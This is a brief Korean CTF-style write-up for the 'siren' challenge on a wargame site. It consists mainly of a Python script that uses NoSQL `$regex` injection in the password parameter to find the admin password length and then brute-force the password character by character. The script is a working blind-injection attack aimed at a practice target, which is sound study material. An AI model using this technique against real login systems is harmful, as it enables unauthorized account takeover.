단순한 문제.

아래 사이트 참고

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL Injection

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable flag warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

headers = { 'Cookie': 'PHPSESSID=###'}

base_url = "<https://los.rubiya.kr/chall/siren_9e402fc1bc38574071d8369c2c3819ba.php>"

#password_length
pw_len = 8

if pw_len == 0:
    count = 0
    while True:
        count += 1
        query = "?id=admin&pw[$regex]=.{%d}"%count
        url = base_url + query

        res = requests.get(url=url, headers=headers, verify=False)

        if res.text.find("<br><h2>Hello User</h2>") != -1:
            pw_len = count
            print("pw_len : ", count)
            
# pw brute force
password = ''

for i in range(8):
    for j in list(range(0,10))+list('abcdefghijklnmopqrstuvwxyz') + list("abcdefghijklnmopqrstuvwxyz".upper()):
        query = f"?id=admin&pw[$regex]=^{password + str(j)}.*"
        url = base_url + query

        res = requests.get(url=url, headers=headers, verify=False)

        if res.text.find("<br><h2>Hello User</h2>") != -1:
            password += str(j)
            print("password : ", password)